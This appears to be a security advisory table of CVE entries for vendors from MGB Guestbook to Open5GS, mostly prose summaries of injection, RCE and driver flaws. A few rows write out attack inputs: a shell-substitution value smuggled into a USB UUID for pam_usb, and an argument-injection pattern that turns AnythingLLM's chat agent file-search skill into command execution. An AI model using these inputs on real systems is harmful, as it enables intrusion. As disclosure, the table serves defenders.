| M-Gb--MGB OpenSource Guestbook | MGB OpenSource Guestbook 0.7.0.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to email.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table and column names. | 2026-05-30 | 8.2 | CVE-2018-25411 |
| Magentech--SW Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Magentech SW Core allows PHP Local File Inclusion. This issue affects SW Core: from n/a through 1.7.18. | 2026-05-26 | 7.5 | CVE-2026-39661 |
| MapServer--MapServer | MapServer is a system for developing web-based GIS applications. From 6.4.0 to before 8.6.3, msSLDParseUserStyle always calls _SLDApplyRuleValues(psRule, psLayer, 1); for any <Rule> carrying <ElseFilter/> - it assumes msSLDParseRule added one class. When the rule has no symbolizer (a structurally valid SLD), msSLDParseRule adds zero, and _SLDApplyRuleValues ends up indexing _class[-1], resulting in a NULL pointer dereference. A 200-byte well-formed SLD via the WMS SLD_BODY= parameter is enough to trigger this, no auth required. This vulnerability is fixed in 8.6.3. | 2026-05-27 | 7.5 | CVE-2026-45104 |
| marcantondahmen--automad | Automad is a flat-file content management system and template engine. From 2.0.0-alpha.1 to 2.0.0-beta.27, a Broken Access Control vulnerability allows an unauthenticated attacker to retrieve the bcrypt password hash of every administrator account with a single POST request. The /_api/user-collection/create-first-user setup endpoint remains publicly accessible once initial configuration is complete and returns full serialized user data in the JSON response body. This vulnerability is fixed in 2.0.0-beta.28. | 2026-05-28 | 7.5 | CVE-2026-45332 |
| MarcelRoozekrans--roslyn-codelens-mcp | Roslyn CodeLens MCP Server is a Roslyn-based MCP server providing semantic code intelligence for .NET codebases. From 0.0.9 to 1.17.0, the get_diagnostics MCP tool loads and executes all DiagnosticAnalyzer assemblies referenced by the target solution without any allowlist, signature check, or user confirmation; includeAnalyzers defaults to true, so no explicit opt-in is required. An attacker who can place a malicious .csproj referencing an attacker-controlled DLL in a location the victim opens with the MCP server will achieve arbitrary code execution in the server process with the server's OS privileges. This vulnerability is fixed in 1.17.0. | 2026-05-29 | 7.8 | CVE-2026-45555 |
| masci--banks | Banks generates meaningful LLM prompts using a template language that makes sense. Prior to 2.4.2, banks uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This vulnerability is fixed in 2.4.2. | 2026-05-26 | 7.5 | CVE-2026-44209 |
| Mattermost--Mattermost | Mattermost Plugins versions <=1.1.5 fail to sanitize filenames received from federated peers before using them to construct export destination paths, which allows an administrator of a remote federated Mattermost server to write files to arbitrary locations within the target server's filestore via a malicious filename delivered through the shared-channel attachment sync protocol. Mattermost Advisory ID: MMSA-2026-00659 | 2026-05-27 | 8 | CVE-2026-6957 |
| Mautic--API Contact Filtering | An SQL injection vulnerability exists in Mautic's API contact filtering mechanism. Due to insufficient recursive sanitization of nested query parameters, an authenticated API user can bypass input filtering and inject arbitrary SQL commands. | 2026-05-29 | 7.1 | CVE-2026-4776 |
| Mautic--Mautic 7 API v2 | An authorization bypass vulnerability exists in the Mautic 7 API v2 endpoints (utilizing API Platform). Under certain conditions, roles configured with owner-scope restrictions (such as `viewown` or `editown`) are not properly enforced. This allows low-privilege authenticated API users to bypass ownership-logic controls and access or modify resources belonging to other users. | 2026-05-29 | 7.1 | CVE-2026-9808 |
| Mautic--Mautic 7 Campaign Import | A path traversal vulnerability exists in the campaign import feature of Mautic 7. When extracting uploaded ZIP files during campaign imports, a flaw in the validation logic allows file paths to escape the intended temporary directories. An authenticated user with campaign import privileges (campaign:imports:create) can write arbitrary PHP files to sensitive system directories. An attacker can exploit this to overwrite critical internal configuration or cache components, resulting in Remote Code Execution (RCE) under the context of the web server user. | 2026-05-29 | 9.9 | CVE-2026-9559 |
| Mautic--Mautic 7 Projects | A stored Cross-Site Scripting (XSS) vulnerability exists in the Projects component of Mautic 7. When displaying project tags and popovers on administrative detail views (such as campaigns, emails, or forms), user-supplied project names are rendered without proper sanitization. An authenticated user with permissions to create or edit projects can exploit this to inject malicious script payloads. When an administrative user views an entity associated with a compromised project and hovers over its tag, the injected script executes within the context of their active browser session. This could allow an attacker to perform administrative actions on behalf of the victim, alter system configurations, or exfiltrate sensitive data. | 2026-05-29 | 7.6 | CVE-2026-9809 |
| Mautic--Mautic Theme Engine | A Server-Side Template Injection (SSTI) vulnerability exists in Mautic's theme engine. The platform renders uploaded Twig templates without a sandbox or strict function restrictions. Authenticated users with permissions to create or upload themes can abuse this to execute arbitrary code on the hosting server (Remote Code Execution) or access restricted system files and configuration settings. | 2026-05-29 | 9.9 | CVE-2026-9558 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the userinfo endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40810 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the ssoabstractservice due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40811 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getLiveValues functions sn parameter due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40812 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getLiveValues functions tagid parameter due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40813 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dataapi.php files _mb24confi_getTagAlarm function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40814 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _mb24api_getUserAccount function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40815 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the mb24alarm.php files _mb24confi_getTagAlarm function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40816 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAlarmProfiles function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40817 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _mb24confi_getDevice function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40818 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the sync_data24 task due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40819 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dash.php files saveDashboardLayout function due to improper neutralization of special elements in a SQL INSERT command allowing for reading the whole database and inserting entries into a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40833 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dash_layout.php files saveDashboardLayout function due to improper neutralization of special elements in a SQL INSERT command allowing for reading the whole database and inserting entries into a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40834 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the inmessage model due to improper neutralization of special elements in a SQL DELETE command allowing for reading the whole database and deleting entries in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 7.1 | CVE-2026-40836 |
| MB connect line--mbCONNECT24 | An unauthenticated remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAccountData function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 7.5 | CVE-2026-40850 |
| MB connect line--mbNET/mbNET.rokey | A local attacker can perform a confusion attack on the cfgparser via a specially crafted file on an USB stick leading to code execution. This can result in a total loss of confidentiality, integrity and availability. | 2026-05-27 | 8.4 | CVE-2026-40851 |
| MB connect line--mbNET/mbNET.rokey | A highly authenticated attacker can alter the config generator injecting a payload into future created configurations. The device is not correctly checking this configuration value before passing it to an system execute leading to code execution. This can result in a total loss of confidentiality, integrity and availability. | 2026-05-27 | 7.2 | CVE-2026-40852 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, a crafted UUID such as $(id>/tmp/rce) in the config causes root RCE when pamusb-conf --reset-pads is run. A USB device with a crafted filesystem UUID (some controllers allow this) can inject the payload at --add-device time. Also, userName from the XML config is passed to os.system() in pamusb-agent, which invokes a shell. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 8.2 | CVE-2026-44712 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, src/tmux.c reads the user's $TMUX environment variable, splits it on commas, and interpolates the socket-path component directly into a shell command passed to popen(). Because the value is placed inside double-quotes without sanitisation, any value containing " terminates the quoted string and injects arbitrary shell syntax. popen() runs as root inside the PAM stack. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 8.8 | CVE-2026-44713 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, when a PAM service is configured with deny_remote=false in pam_usb (commonly done for display managers such as gdm-password or lightdm to bypass process/TTY heuristics for local sessions), the PAM_RHOST check in pusb_do_auth() is also skipped. PAM_RHOST is set by remote daemons (sshd, XDMCP servers) to identify the remote client address. Because the check is gated inside if (opts.deny_remote), a genuine remote XDMCP connection reaches the USB device authentication step instead of being rejected. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 8.1 | CVE-2026-48064 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, pamusb-pinentry reads the PINENTRY_FALLBACK_APP environment variable and executes it directly without any validation. Any process that can set environment variables before pamusb-pinentry is invoked can point PINENTRY_FALLBACK_APP at an arbitrary binary or script and have it executed with the privileges of the pam_usb tool chain. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 7.8 | CVE-2026-44709 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, symlink attacks on pad directory and pad files enable authentication bypass and root file corruption. This vulnerability is fixed in 0.8.7. | 2026-05-27 | 7.9 | CVE-2026-44711 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb's deny_remote feature checks utmpx ut_addr_v6 to detect whether an authentication request originates from a remote session. The outer guard was if (utent->ut_addr_v6[0] != 0), which only tests the first 32-bit word of the 128-bit address field. IPv4-mapped IPv6 addresses (::ffff:x.x.x.x) store the IPv4 address in ut_addr_v6[3] with ut_addr_v6[0] == 0. On systems where the SSH daemon listens on :: (IPv6 wildcard) with AddressFamily any -- common on Ubuntu and Debian -- incoming IPv4 connections are recorded in utmpx as IPv4-mapped IPv6 addresses. The outer check evaluates to false, the remote-detection block is skipped entirely, and the session is treated as local. deny_remote=true does not block the authentication. An attacker with physical access to a registered USB device can authenticate over SSH on an affected system as if they were sitting at a local terminal, bypassing the deny_remote restriction. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 7.4 | CVE-2026-47269 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, the pusb_pad_compare() function in src/pad.c only verified that the user-side pad (~/.pamusb/device.pad) could be read, but did not enforce that the system-side pad (the pad file on the USB device) was also present and readable. If the user-side pad was deleted or unreadable, the function returned a failure that was treated as non-fatal in certain code paths, allowing authentication to succeed without the USB device being verified. A local user can delete their own ~/.pamusb/device.pad to remove the USB device requirement and authenticate without the physical device. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 7.1 | CVE-2026-47272 |
| MedDream--PACS Server Premium | MedDream PACS Server Premium 6.7.1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the email parameter. Attackers can submit crafted POST requests to the userSignup.php endpoint with SQL payloads in the email field to extract sensitive database information from the backend MySQL database. | 2026-05-25 | 8.2 | CVE-2018-25372 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib LXF parsing heap-based buffer overflow vulnerability | 2026-05-26 | 7.8 | CVE-2026-25104 |
| MediaArea--MediaInfoLib | MediaArea MediaInfoLib ID3v2 parsing heap buffer overflow vulnerability | 2026-05-26 | 7.8 | CVE-2026-25713 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO uses the user-controlled task_name value directly when constructing session log paths. An authenticated client can supply path traversal sequences in task_name and cause UFO to create log directories and log files outside the intended logs/ directory. | 2026-05-27 | 8.1 | CVE-2026-46402 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO's WebSocket control plane trusts client-supplied identity and role fields in task messages. A client connection can register as a normal device, but later send a TASK message claiming client_type="constellation" and target_id=<victim-device-id>. The server trusts the role and target values from the wire message rather than enforcing the role registered for that WebSocket connection. As a result, any authenticated WebSocket client with the shared server token can spoof the higher-privilege constellation role and dispatch attacker-controlled tasks to another connected device. The same client registry also allows duplicate client_id registration, overwriting an existing live client's stored websocket, role, and task protocol. This is an authenticated WebSocket role/identity spoofing issue leading to peer task hijacking. | 2026-05-27 | 8.8 | CVE-2026-46414 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. Microsoft UFO tagged releases up to and including v3.0.0 contain an OS command injection vulnerability in the shell action replay path. In affected releases, ShellReceiver.run_shell() passes a command string from action parameters directly to subprocess.Popen() with shell=True and executable=powershell.exe. The same shell-execution behavior is also reachable through ShellReceiver.execute_command(). The shell receiver is invoked by action classes such as RunShellCommand.execute() and ExecuteCommand.execute(), which forward stored action parameters to the shell receiver. Because UFO stores planned and executed actions in per-session JSON records, an attacker who can write or modify a session/action JSON file can plant a shell action. When the session is resumed or replayed, UFO executes the attacker's command as the UFO process user. | 2026-05-27 | 7.8 | CVE-2026-45322 |
| mikro-orm--mikro-orm | MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to @mikro-orm/knex 6.6.14 and @mikro-orm/sql 7.0.14, MikroORM's identifier-quoting helper (Platform.quoteIdentifier and the postgres/mssql overrides) and its JSON-path emitters (Platform.getSearchJsonPropertyKey, quoteJsonKey) did not properly escape characters that delimit the SQL identifier or string-literal context they emit into. When application code passes attacker-influenced strings to public ORM APIs that expect an identifier or a JSON-property filter, an attacker can break out of the quoted context and inject arbitrary SQL. This vulnerability is fixed in @mikro-orm/knex 6.6.14 and @mikro-orm/sql 7.0.14. | 2026-05-26 | 7.6 | CVE-2026-44680 |
| miniOrange--miniorange otp verification | Incorrect Privilege Assignment vulnerability in miniOrange miniorange otp verification miniorange-otp-verification allows Privilege Escalation.This issue affects miniorange otp verification: from n/a through <= 5.4.9. | 2026-05-27 | 9.8 | CVE-2026-42731 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, the filesystem-search-files agent skill passes its LLM-controlled pattern parameter to ripgrep as a positional argument without a -- end-of-options separator. ripgrep parses any argument that starts with - as an option, so a pattern of --pre=/bin/sh turns ripgrep into a script executor: it runs /bin/sh <file> for every file it walks. An attacker who can chat with an agent on a deployment with the filesystem plugin enabled (the default in the official Docker image) can use this, together with the sibling filesystem-write-text-file skill, to run arbitrary commands inside the AnythingLLM server container. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 7.5 | CVE-2026-48116 |
| Mirasvit--Full Page Cache Warmer for Magento 2 | Mirasvit Full Page Cache Warmer for Magento 2 before version 1.11.12 contains a PHP object injection vulnerability that allows unauthenticated attackers to achieve remote code execution by supplying a crafted serialized PHP object in the CacheWarmer cookie. Attackers can exploit the unrestricted call to PHP's native unserialize() function combined with gadget chains available in Magento and its dependencies to execute arbitrary code on the server. | 2026-05-26 | 9.8 | CVE-2026-45247 |
| Moosocial--mooSocial Store Plugin | mooSocial Store Plugin 2.6 contains a blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries through the product parameter in URL rewrite functionality. Attackers can inject SQL code using boolean-based blind, time-based blind, or stacked query techniques in the product URI parameter to extract sensitive database information. | 2026-05-25 | 8.2 | CVE-2018-25371 |
| mossdef-org--luci-app-https-dns-proxy | luci-app-https-dns-proxy through 2025.12.29-5 - an optional LuCI web UI add-on for the https-dns-proxy package, distributed through the OpenWrt community packages feed and not installed by default - contains a command injection vulnerability in the setInitAction function. An authenticated user holding the luci.https-dns-proxy ACL permission can inject shell metacharacters through the 'name' parameter of a ubus RPC call to luci.https-dns-proxy setInitAction, resulting in arbitrary command execution as root on the underlying device. Core OpenWrt is not affected; only installations that have opted in to the luci-app-https-dns-proxy package are vulnerable. | 2026-05-26 | 8.8 | CVE-2026-46368 |
| mouse07410--asn1c | mouse07410/asn1c is an ASN.1 compiler. In 1.4 and earlier, a memory safety vulnerability was identified in the OER decoding skeleton files generated by asn1c (specifically INTEGER_oer.c). When parsing a maliciously crafted, zero-length OER payload for a variable-length, non-negative INTEGER type, the decoder fails to validate the required bytes before extracting the Most Significant Bit (MSB). This forces a precise 1-byte Heap Out-of-Bounds (OOB) Read. Because asn1c generated code is primarily deployed to parse untrusted network inputs (such as V2X network protocols, 5G telecom headers, or X.509 certificates), when the decoder processes untrusted network-originated input, a remote attacker can exploit this to cause a Denial of Service (DoS) or trigger incorrect integer interpretation in downstream applications (e.g., protocol state poisoning or logic bypass). | 2026-05-29 | 8.2 | CVE-2026-45615 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a stack buffer overflow vulnerability in the pcm_unpack_24be function in src/pcm/Pack.cxx that allows unauthenticated attackers to corrupt stack memory by triggering an off-by-one write in the PCM decoder plugin. Attackers can issue two MPD commands referencing a malicious HTTP audio source to cause the unpack loop to write 1366 entries into a 1365-entry buffer, overwriting four bytes past the array boundary with three attacker-controlled bytes from an HTTP response body, resulting in daemon termination or potential code execution. | 2026-05-28 | 8.6 | CVE-2026-49127 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a path traversal vulnerability in LocalStorage::MapFSOrThrow and LocalStorage::MapUTF8 within the local storage plugin, where the on-disk path is constructed by joining the storage root with a user-supplied URI as plain strings without canonicalization, allowing '..' segments to survive into the resolved path and be flattened by the kernel at openat() time. An unauthenticated attacker can exploit this flaw using the listfiles command to enumerate names, sizes, and modification times of arbitrary directories readable by the MPD process, and the albumart command to read image files in any attacker-chosen directory outside the configured music_directory. | 2026-05-28 | 7.5 | CVE-2026-49128 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, Nautobot's Webhook data model and associated feature set could be configured by users with sufficient access to perform requests to various hosts and IP addresses that should not be permitted, allowing for various behaviors similar to server-side request forgery (SSRF). This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 8.5 | CVE-2026-44797 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, a user with access to add/change a GitRepository record could use the REST API to directly set the current_head field on the record, which was not intended to be user-editable. Doing so could cause Nautobot's local clone(s) of the relevant repository to checkout a commit other than the latest commit on the specified branch (resulting in misleading state), or potentially to be unable to make use of the repository at all (until manually remediated) due to the current_head pointing to a nonexistent commit hash or malformed value. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 7.1 | CVE-2026-44798 |
| Network Optix--Nx Witness VMS | CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround: For existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {"supportedOrigins": "null"}. Alternatively, select High security level during initial setup. Solution: Update to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration. | 2026-05-29 | 7.5 | CVE-2026-10056 |
| NI--SystemLink Enterprise | There is an authentication bypass vulnerability in the NI SystemLink Enterprise Dashboard application that may allow an unauthenticated remote attacker to bypass authentication controls leading to privilege escalation or information disclosure. Successful exploitation requires an attacker to send a specially crafted HTTP request. This vulnerability affects NI SystemLink Enterprise 2026-04 and prior versions. | 2026-05-29 | 9.1 | CVE-2026-9051 |
| ninjew--GEO my WP | The GEO my WP plugin for WordPress is vulnerable to SQL Injection via the 'swlatlng' and 'nelatlng' parameters in all versions up to, and including, 4.5.5 The parameters are read from $_SERVER['QUERY_STRING'] via parse_str() (bypassing WordPress's wp_magic_quotes protection, which only covers $_POST/$_GET/$_COOKIE/$_REQUEST), then each is split on ',' via explode() and the resulting fragments are interpolated directly into a SQL BETWEEN clause in gmw_get_locations_within_boundaries_sql() without is_numeric() validation, (float) casting, esc_sql(), or $wpdb->prepare(). This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation requires the site to host the Posts Locator search-results shortcode (`[gmw form="results" form_id=N]`) on a public page and to have at least one published post with an associated gmw_location row. | 2026-05-30 | 7.5 | CVE-2026-9757 |
| Nordvpn--NordVPN | Nord VPN 6.14.31 contains a denial of service vulnerability that allows unauthenticated attackers to crash the application by submitting an excessively long string in the password field. Attackers can paste a buffer of repeated characters into the password input field to trigger an application crash when attempting to authenticate. | 2026-05-25 | 7.5 | CVE-2018-25368 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 8.8 | CVE-2026-24187 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause improper access to GPU resources. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24190 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows contains a vulnerability where an attacker could cause a time-of-check time-of-use issue. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24191 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where an attacker could cause an incorrect conversion between numeric types, leading to a heap buffer overflow. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24192 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24193 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in a kernel mode layer handler, where a user could cause improper permission handling. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24194 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where a user could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to denial of service and information disclosure. | 2026-05-26 | 7.1 | CVE-2026-24196 |
| NVIDIA--Guest driver | NVIDIA Display Driver for Linux contains a vulnerability in UVM, where a user could cause improper input validation. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 7.1 | CVE-2026-24195 |
| NVIDIA--Guest driver | NVIDIA Display Driver for Linux contains a vulnerability in UVM, where a user could cause improper input validation. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 7.1 | CVE-2026-24195 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable for Linux contains a vulnerability where sensitive information is transmitted in clear text. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2026-05-26 | 7.5 | CVE-2026-24212 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Transformers4Rec for Linux contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-05-26 | 7.8 | CVE-2026-24162 |
| NVIDIA--Virtual GPU Manager | NVIDIA vGPU software contains a vulnerability in the virtual GPU manager, where an attacker could cause a use-after-free for stack memory. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7 | CVE-2026-24200 |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.9.6, sandbox-defined functions expose Function.caller, allowing sandboxed code to recover the internal LispType.Call runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. This vulnerability is fixed in 0.9.6. | 2026-05-28 | 10 | CVE-2026-43898 |
| omnivo--Booking Calendar Event Calendar | The HBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'hb_country_iso', 'hb_usa_state_iso', and 'hb_canada_province_iso' parameters in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page (the HBook Customers admin page). | 2026-05-27 | 7.2 | CVE-2026-8143 |
| OneUptime--oneuptime | OneUptime is an open-source monitoring and observability platform. Prior to 10.0.98, OneUptime uses the Node.js' vm module as an isolation primitive. This API was not designed for that and can be escaped via error objects and infinite recursion. This vulnerability is fixed in 10.0.98. | 2026-05-27 | 9.9 | CVE-2026-45102 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the frm_passwd parameter. Attackers can send POST requests to main.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-29 | 8.2 | CVE-2018-25398 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the tick_lat and tick_lng parameters. Attackers can send GET requests to nearby.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-29 | 8.2 | CVE-2018-25399 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to the ajax/form_post.php endpoint with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25400 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to sever_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25401 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to inc_types_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25402 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to city_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25403 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the ticket_id parameter. Attackers can send GET requests to add_facnote.php with crafted SQL payloads to extract sensitive database information including version details and other data. | 2026-05-29 | 8.2 | CVE-2018-25404 |
| open-telemetry--opentelemetry-js | opentelemetry-js is the OpenTelemetry JavaScript Client. Prior to 0.217.0, a single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default 0.0.0.0:9464) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught TypeError that terminates the process. This vulnerability is fixed in 0.217.0. | 2026-05-27 | 7.5 | CVE-2026-44902 |
| Open5GS--Open5GS | A vulnerability was identified in Open5GS up to 2.7.6. This impacts an unknown function of the file src/amf/ngap-handler.c of the component NGAP PathSwitchRequest Message Handler. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The identifier of the patch is a188e36b1741ffc2252133f59b1bda4f14d3cb5c. It is suggested to install a patch to address this issue. | 2026-05-31 | 7.3 | CVE-2026-10157 |
